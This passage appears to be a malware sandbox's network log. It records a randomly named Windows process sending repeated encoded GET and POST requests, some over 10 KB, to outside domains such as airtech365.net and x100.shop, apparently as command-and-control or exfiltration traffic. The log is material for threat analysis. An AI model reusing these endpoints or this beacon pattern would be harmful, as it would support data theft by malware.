sL9tFJ=5RIwBALsu/8WGWmaGbqTpg7uzibC9nnlvjw/sYclFQ7DhXlB4NvlsXlTATsKSDxmgsmXpgMkOg4yHJS0F75sW5XIJMAa//Xvk7rdmwmJFRTzXNLsLgDwXZN090P60mTs3I8IqBQvRqxFIJahU+Cgjo8kCxj2oXY411nZxb4kCBrMWEp3ugyijmsmaA/cM5OscziVL+1qvF4BI5iR7/BDbskbFuU+B6HblwuhQple0115H/5NQf/CCiZepyuGe74lsCL6LSY9mKoi2M/3K8G9LkONWYx4mBCIR7/2G2ARGd0j+qyy+qnD6wQ8WIGajOCqJit6RQi9wkDGTQpFqCY5cKJCwVz3Ruv6fYbK/P7mCEa6N1AGZbyi3UDiLsJI7toQhj8WMBhqefBTbTHL7LIDlnmM5INelZQBLzDwJ52Xbp7tmrfo24oR1HVtcYym/zouQFs7SH55TDVIXQhtlkG9Xi/SW9w8ES/yQzGiYv0LgGbztuS4Pfgb04MA47wzlf//pfZnxQAeYAGi6QfcnAVvz9DbCNQu7ilFg4Mi+TPI1+eOOgyqtm4as98jEIuzUZ1OgbqaOdkfhQKoOzFjXQhEz0Q3uTV/gbO30lc+BAdQfsy1Ymo2PtqPe2O9u3gxRnL6+fG5YhduSspsxPUBMj180BvnWjMvz0+IADQf1SMaJSLhuZn8iOFWE80ZKxsRz8m1H6K10Jay1ic1XKwhawLBy85yq5NPbR2TJxn0e63qilOqMOc2b75grMz4MabYdPvRmbpseaHlnaI1XZR0uTONdmuM+7smo3ArENwAG4VXmEA4q8g4SIgxEkPQddWBTkXtMNjnrEQbQn03XhxUtTvrm6E5lcZN0I8auZP2xyCg1bIIyI3HetgIauAt304Wz6Ps/sipUF30PPKKhV24vDUn9sVtN0bvUP82c/jG8UyTZznWYwZSVKVVSNXTnLiIg7cSRFfWVdeL7ad5xOMlxAyWSy+/RuqLP2KU5ZVgm9eXV/Lt8 [TRUNCATED]
Sep 26, 2024 14:26:33.156708956 CEST	216	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 12:26:32 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 13 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 49 6e 76 61 6c 69 64 20 6c 69 6e 6b 2e Data Ascii: Invalid link.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49783	50.3.111.89	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:34.959969997 CEST	464	OUT	GET /m4jf/?sL9tFJ=0TgQC1Luv9cVf1TCKLCdjgzht3H610PutW8Pu5k4ZnbC5HUSntLYriRCMSQSDyNJ5vKB93oSdDtzFOKGboJdJ4jxO8kQzN3YuKmjgHKVRyz7ENXIVwzZU4M=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.solargridxx.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:26:35.573121071 CEST	216	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 12:26:35 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 13 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 49 6e 76 61 6c 69 64 20 6c 69 6e 6b 2e Data Ascii: Invalid link.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49784	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:48.719868898 CEST	732	OUT	POST /87wq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.airtech365.net Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.airtech365.net Referer: http://www.airtech365.net/87wq/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 32 5a 6a 48 31 5a 4d 43 6e 79 70 77 47 35 46 50 34 79 4f 69 32 64 66 6d 34 68 72 34 44 39 76 68 71 43 78 62 41 6a 5a 55 70 6a 2f 31 55 63 64 72 62 4a 55 36 51 39 79 44 67 38 4c 49 41 59 78 7a 46 62 41 74 79 58 62 7a 62 54 39 32 73 34 45 70 66 38 54 49 69 69 44 32 65 6d 42 59 31 58 31 65 30 42 70 54 52 72 4e 49 63 4d 75 30 64 6e 6b 4c 58 32 6b 4d 4b 49 55 39 34 51 4b 78 69 78 42 75 51 36 49 51 4c 70 44 5a 4b 51 6f 50 45 78 46 33 6f 6f 42 59 64 55 76 30 62 33 5a 64 64 37 4b 66 4c 52 5a 6c 6e 67 74 34 78 56 62 68 76 7a 32 54 69 66 66 47 74 66 6b 43 71 42 64 52 4f 54 6b 62 2b 51 3d 3d Data Ascii: sL9tFJ=2ZjH1ZMCnypwG5FP4yOi2dfm4hr4D9vhqCxbAjZUpj/1UcdrbJU6Q9yDg8LIAYxzFbAtyXbzbT92s4Epf8TIiiD2emBY1X1e0BpTRrNIcMu0dnkLX2kMKIU94QKxixBuQ6IQLpDZKQoPExF3ooBYdUv0b3Zdd7KfLRZlngt4xVbhvz2TiffGtfkCqBdROTkb+Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49785	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:51.264977932 CEST	752	OUT	POST /87wq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.airtech365.net Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.airtech365.net Referer: http://www.airtech365.net/87wq/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 32 5a 6a 48 31 5a 4d 43 6e 79 70 77 48 5a 31 50 2f 52 6d 69 6e 4e 66 68 6b 78 72 34 61 74 75 6f 71 43 39 62 41 69 73 4a 70 51 4c 31 4e 39 42 72 4a 4d 34 36 64 64 79 44 6f 63 4c 52 50 34 78 34 46 62 63 4c 79 56 2f 7a 62 54 5a 32 73 35 55 70 63 4d 76 50 77 43 44 30 46 32 42 61 78 58 31 65 30 42 70 54 52 72 5a 75 63 4d 6d 30 63 54 59 4c 59 33 6b 50 56 34 55 79 2f 51 4b 78 6d 78 41 70 51 36 4a 39 4c 6f 76 7a 4b 56 30 50 45 7a 4e 33 6d 5a 42 5a 58 55 76 79 56 58 59 5a 52 70 48 30 4e 6b 67 6b 68 7a 59 65 37 6b 32 41 6a 56 6e 4a 7a 75 2b 52 2f 66 41 78 33 47 55 6c 44 51 5a 53 6c 59 43 64 4d 50 46 68 64 76 66 4e 58 35 51 56 30 48 36 2f 44 7a 45 3d Data Ascii: sL9tFJ=2ZjH1ZMCnypwHZ1P/RminNfhkxr4atuoqC9bAisJpQL1N9BrJM46ddyDocLRP4x4FbcLyV/zbTZ2s5UpcMvPwCD0F2BaxX1e0BpTRrZucMm0cTYLY3kPV4Uy/QKxmxApQ6J9LovzKV0PEzN3mZBZXUvyVXYZRpH0NkgkhzYe7k2AjVnJzu+R/fAx3GUlDQZSlYCdMPFhdvfNX5QV0H6/DzE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49786	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:53.809027910 CEST	10834	OUT	POST /87wq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.airtech365.net Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.airtech365.net Referer: http://www.airtech365.net/87wq/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 32 5a 6a 48 31 5a 4d 43 6e 79 70 77 48 5a 31 50 2f 52 6d 69 6e 4e 66 68 6b 78 72 34 61 74 75 6f 71 43 39 62 41 69 73 4a 70 52 7a 31 4e 76 4a 72 4b 76 41 36 63 64 79 44 6d 38 4c 4d 50 34 78 6c 46 62 45 50 79 56 43 4f 62 52 78 32 76 62 4d 70 5a 2f 33 50 36 43 44 30 61 6d 42 48 31 58 30 61 30 46 4e 58 52 72 4a 75 63 4d 6d 30 63 56 38 4c 52 47 6b 50 54 34 55 39 34 51 4b 48 69 78 41 4e 51 36 52 44 4c 6f 72 4a 4c 68 34 50 46 54 64 33 6b 71 70 5a 62 55 76 77 53 58 59 2f 52 70 4c 72 4e 6b 55 53 68 7a 64 37 37 6e 71 41 79 67 43 43 71 66 6e 4c 6d 76 51 75 6d 32 45 55 61 53 63 4c 6c 35 43 56 4a 61 6c 34 50 39 62 64 66 75 74 45 73 6c 32 48 63 55 6e 74 45 56 76 43 62 70 44 54 53 75 30 4d 73 79 4b 77 76 6d 75 78 38 65 78 6b 6e 69 79 2b 56 56 30 64 35 45 42 67 37 4b 69 56 67 4c 6b 2b 35 6f 50 49 77 35 54 4d 42 75 66 45 4b 49 65 6e 54 49 41 34 63 4f 4e 48 36 43 56 32 75 59 4a 78 59 67 7a 43 65 64 74 55 78 63 66 74 31 62 35 39 70 63 4e 35 34 37 75 47 56 6c 31 6a 34 50 4d 45 65 6c 45 65 39 69 4f [TRUNCATED] Data Ascii: sL9tFJ=2ZjH1ZMCnypwHZ1P/RminNfhkxr4atuoqC9bAisJpRz1NvJrKvA6cdyDm8LMP4xlFbEPyVCObRx2vbMpZ/3P6CD0amBH1X0a0FNXRrJucMm0cV8LRGkPT4U94QKHixANQ6RDLorJLh4PFTd3kqpZbUvwSXY/RpLrNkUShzd77nqAygCCqfnLmvQum2EUaScLl5CVJal4P9bdfutEsl2HcUntEVvCbpDTSu0MsyKwvmux8exkniy+VV0d5EBg7KiVgLk+5oPIw5TMBufEKIenTIA4cONH6CV2uYJxYgzCedtUxcft1b59pcN547uGVl1j4PMEelEe9iOhrq2dd05pOnhwqLL9RQeX3xgE26omOt4zNuocj4514TskxuvACE0AFRWIxzlPLVQSmLVEXhYvlxSbxxohA/BGiSYPCKZoSxg2NOEXJ7vVFIXZdx6v5l+k0r03kHKAYvEyqefyG32d/8q8ub7xX4TrhBVCTkMGQCdX7alKOPzQAc+lfoS03ig64CSzJZM/F5y2s5OKsXFjBrjS9Kpa4vdQdyZhC0r4GyVPqKNgrPJ7SW9aEgj0vq0jy4QHQP/TQCUgM+HD9sgfzBmNyn4K1Vj4+7C5fMO93JwB5lh9qJYZc+Zmn/7462QOdYDzt2hsX4HgeekOwevx3swU5pruUn5tIR7Lmuk6kXqcY9MR7fkS7DBcDBLN7ppz5+PUHyajsVH2pDXVI3E1qwbMLrQQPG91m8iip9Hzo4FU9okF0JfMfQe0BCxx+7Y//AcERz4SqBo4cigWzMnyhSn44+EVubcI2nGAJbn4bjCHRITYPlENl8nXNl/Gpm5Ip9/pyT6qCsbvdd+o7egl2ZtU/hN78JncVWM47IkkTLhEGsK3GmD+b3nSOAcxSf0ON/w3LUjXebne0LGDD18rSoeInflNSa13GTYTanttc7cD2DR5cYuKpTfVpz0bWflaX+1g5vU9w3VoqxsEgAEIbATRRkAl8+k7zru3y1AZ29eFQ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49787	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:56.352355957 CEST	462	OUT	GET /87wq/?sL9tFJ=7bLn2toYuHgKY4svyzPVudTtlla1bf7PpnNwFD1LjHXMN8tsWMAuSdGiuKH0HcFEBqk44V2BEBEKz59MOu/v9Tn1fU8u33FZ8GhyTM58dtSMSWcfKlkKKIE=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.airtech365.net Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:26:56.802359104 CEST	396	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 12:26:56 GMT Content-Type: text/html Content-Length: 256 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 4c 39 74 46 4a 3d 37 62 4c 6e 32 74 6f 59 75 48 67 4b 59 34 73 76 79 7a 50 56 75 64 54 74 6c 6c 61 31 62 66 37 50 70 6e 4e 77 46 44 31 4c 6a 48 58 4d 4e 38 74 73 57 4d 41 75 53 64 47 69 75 4b 48 30 48 63 46 45 42 71 6b 34 34 56 32 42 45 42 45 4b 7a 35 39 4d 4f 75 2f 76 39 54 6e 31 66 55 38 75 33 33 46 5a 38 47 68 79 54 4d 35 38 64 74 53 4d 53 57 63 66 4b 6c 6b 4b 4b 49 45 3d 26 67 42 37 74 3d 78 46 71 58 31 68 43 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sL9tFJ=7bLn2toYuHgKY4svyzPVudTtlla1bf7PpnNwFD1LjHXMN8tsWMAuSdGiuKH0HcFEBqk44V2BEBEKz59MOu/v9Tn1fU8u33FZ8GhyTM58dtSMSWcfKlkKKIE=&gB7t=xFqX1hC8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49788	13.248.252.114	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:27:01.856981039 CEST	717	OUT	POST /uaxy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.x100.shop Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.x100.shop Referer: http://www.x100.shop/uaxy/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 75 41 41 52 4a 72 50 41 62 45 71 39 70 6b 4a 33 7a 65 46 70 36 37 56 70 43 35 62 77 47 45 67 6c 65 48 4b 72 51 74 59 76 4e 53 69 44 75 6b 72 66 41 45 6b 74 68 38 56 79 4d 47 4f 37 45 41 35 71 53 75 61 61 46 58 43 66 38 54 47 69 54 53 62 79 65 33 33 44 6b 55 35 66 48 4d 53 44 35 33 53 37 46 74 41 42 33 78 42 46 4e 66 7a 54 68 30 34 33 70 31 50 37 6e 70 79 4f 51 30 41 49 49 6f 51 4d 66 48 4d 44 47 69 34 57 68 66 7a 2b 49 33 67 71 75 66 7a 47 63 54 46 6b 32 73 78 75 55 4e 63 56 63 44 50 70 69 62 78 55 4e 35 35 51 2f 38 62 31 69 69 65 49 68 44 38 34 45 55 34 73 76 58 52 4a 41 51 3d 3d Data Ascii: sL9tFJ=uAARJrPAbEq9pkJ3zeFp67VpC5bwGEgleHKrQtYvNSiDukrfAEkth8VyMGO7EA5qSuaaFXCf8TGiTSbye33DkU5fHMSD53S7FtAB3xBFNfzTh043p1P7npyOQ0AIIoQMfHMDGi4Whfz+I3gqufzGcTFk2sxuUNcVcDPpibxUN55Q/8b1iieIhD84EU4svXRJAQ==
Sep 26, 2024 14:27:02.405929089 CEST	287	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 26 Sep 2024 12:27:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 78 31 30 30 2e 73 68 6f 70 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://www.x100.shop/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49789	13.248.252.114	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:27:04.400778055 CEST	737	OUT	POST /uaxy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.x100.shop Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.x100.shop Referer: http://www.x100.shop/uaxy/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 75 41 41 52 4a 72 50 41 62 45 71 39 71 45 35 33 2f 64 39 70 38 62 56 71 63 70 62 77 64 55 67 70 65 48 47 72 51 73 74 33 4d 67 32 44 75 42 58 66 4f 6c 6b 74 79 4d 56 79 48 6d 4f 2b 5a 51 35 30 53 75 57 6f 46 56 57 66 38 58 57 69 54 57 66 79 65 45 76 45 32 30 35 64 50 73 53 4e 39 33 53 37 46 74 41 42 33 78 55 67 4e 66 4c 54 69 45 49 33 72 55 50 34 76 4a 79 50 58 30 41 49 4d 6f 51 49 66 48 4e 67 47 6a 6c 44 68 63 4c 2b 49 32 51 71 76 4e 4c 4a 48 44 46 69 72 63 77 6d 5a 2f 31 64 46 52 57 78 6d 61 6c 37 4e 4b 4a 67 2b 36 4b 76 7a 54 2f 66 7a 44 59 4c 5a 54 78 59 69 55 73 41 62 61 4d 65 76 2f 6d 59 33 6f 6a 2f 42 74 66 6e 6c 6c 43 59 4d 34 67 3d Data Ascii: sL9tFJ=uAARJrPAbEq9qE53/d9p8bVqcpbwdUgpeHGrQst3Mg2DuBXfOlktyMVyHmO+ZQ50SuWoFVWf8XWiTWfyeEvE205dPsSN93S7FtAB3xUgNfLTiEI3rUP4vJyPX0AIMoQIfHNgGjlDhcL+I2QqvNLJHDFircwmZ/1dFRWxmal7NKJg+6KvzT/fzDYLZTxYiUsAbaMev/mY3oj/BtfnllCYM4g=
Sep 26, 2024 14:27:04.958197117 CEST	287	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 26 Sep 2024 12:27:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 78 31 30 30 2e 73 68 6f 70 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://www.x100.shop/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49790	13.248.252.114	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:27:06.952435017 CEST	10819	OUT	POST /uaxy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.x100.shop Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.x100.shop Referer: http://www.x100.shop/uaxy/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 75 41 41 52 4a 72 50 41 62 45 71 39 71 45 35 33 2f 64 39 70 38 62 56 71 63 70 62 77 64 55 67 70 65 48 47 72 51 73 74 33 4d 67 75 44 75 7a 50 66 42 6d 38 74 6a 38 56 79 4f 47 4f 2f 5a 51 34 78 53 75 2b 73 46 56 61 6c 38 52 4b 69 56 46 58 79 59 31 76 45 76 45 35 64 44 4d 53 41 35 33 53 75 46 74 51 46 33 78 45 67 4e 66 4c 54 69 48 51 33 76 46 50 34 69 70 79 4f 51 30 41 45 49 6f 51 67 66 48 6c 65 47 67 4a 54 69 74 72 2b 4a 57 41 71 74 2b 7a 4a 4c 44 46 67 6f 63 78 67 5a 2f 70 53 46 52 4b 39 6d 61 52 52 4e 4e 35 67 38 39 6e 70 6f 69 50 43 74 77 51 4d 4f 78 74 79 6b 31 5a 42 57 37 63 4a 2f 4f 2f 41 6d 59 33 33 4e 50 6d 32 67 45 4f 38 64 76 74 74 63 44 2f 37 6f 57 4c 44 65 41 5a 6d 54 68 74 4f 65 74 6b 31 4a 65 35 78 4a 50 69 53 4f 44 77 79 74 37 57 30 37 68 56 39 39 4f 6b 73 51 73 4e 33 53 46 67 69 44 73 6d 54 37 68 36 57 71 34 2f 46 42 6c 59 79 46 55 43 4f 6a 5a 78 36 31 67 6a 6c 42 48 37 53 52 5a 2f 38 6e 78 66 54 58 68 47 46 64 74 78 62 59 44 48 2f 56 58 34 57 78 38 5a 72 31 5a 34 [TRUNCATED] Data Ascii: sL9tFJ=uAARJrPAbEq9qE53/d9p8bVqcpbwdUgpeHGrQst3MguDuzPfBm8tj8VyOGO/ZQ4xSu+sFVal8RKiVFXyY1vEvE5dDMSA53SuFtQF3xEgNfLTiHQ3vFP4ipyOQ0AEIoQgfHleGgJTitr+JWAqt+zJLDFgocxgZ/pSFRK9maRRNN5g89npoiPCtwQMOxtyk1ZBW7cJ/O/AmY33NPm2gEO8dvttcD/7oWLDeAZmThtOetk1Je5xJPiSODwyt7W07hV99OksQsN3SFgiDsmT7h6Wq4/FBlYyFUCOjZx61gjlBH7SRZ/8nxfTXhGFdtxbYDH/VX4Wx8Zr1Z4WQgdo7mUvGtacmbdL1oTeNgrvTnWNEkzCOld0isnbE6FBtKJMlSGSkvlKke0IDz0PFDN1oAW1W6BrFebRUJMbp7+ayZvUEpi+qoQMiRovXcJ71u2xn2R8TrWwDod2pfNKdTvom3h7JS1eyPgVb1evdrzDHkpHq6eQbzuZzYeI0oKx1KyEWb4gOTFfXqUJ0A+aOUY9kWgU6MRge5fKqiojMA0LwdesYRWuh1OPdn/ePXe+HvKf/sdwxI9C2x+OEkdLMEctz9QObAxYG2wenR9FTQWxBS/9hwl6AD5EX5T8h9rmCisgUts5mhw7OVd5TCDYFQ/GbG6Zcxmzhgo1zY4XWx1D2JUOLwyKe6MVQw7finmYofeCtoLu5nHdvAluC0Wo1Mm2VmRvZvhbCeWnAT+VV2vNunB02TGzUBrfapq5FJ0+HaCQtV9PTfjxtI+GEw1JJr1ALYDnQonR/aYlDvjpCog4soAmG6Np5VLTj540Fwp1RsCyAX/gBHU1rj94Et2XaGLqw493Vzh5MoGz9e7wXV2s2t8oXhgWmCZvNTQ1jw8Oy8Wb8Saly72H/s6p4NF4d4+nmGh8OJ98OzbieKjUZj+1PILE98zFC5FZrG2/+PJXPu2OoPya0R/E2KUxdkgGRY/JYGtWjUOnL2XCHHJ3Gxo0BPJqJHe1t [TRUNCATED]
Sep 26, 2024 14:27:07.503957987 CEST	287	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 26 Sep 2024 12:27:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 78 31 30 30 2e 73 68 6f 70 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://www.x100.shop/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49791	13.248.252.114	80

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:27:09.789627075 CEST	457	OUT	GET /uaxy/?sL9tFJ=jCoxKbndYFu2rVUc2fNf8o1DCs+xE29ELzrRYPIrNX671AzrKUsZ0ekHPlezV1wvKt2FOH2y7yDiMlHHG1j7pH9tJsj87FCdBv0goUpKNozmpGwQ2nrx39s=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.x100.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:27:10.353351116 CEST	287	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 26 Sep 2024 12:27:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 78 31 30 30 2e 73 68 6f 70 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://www.x100.shop/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
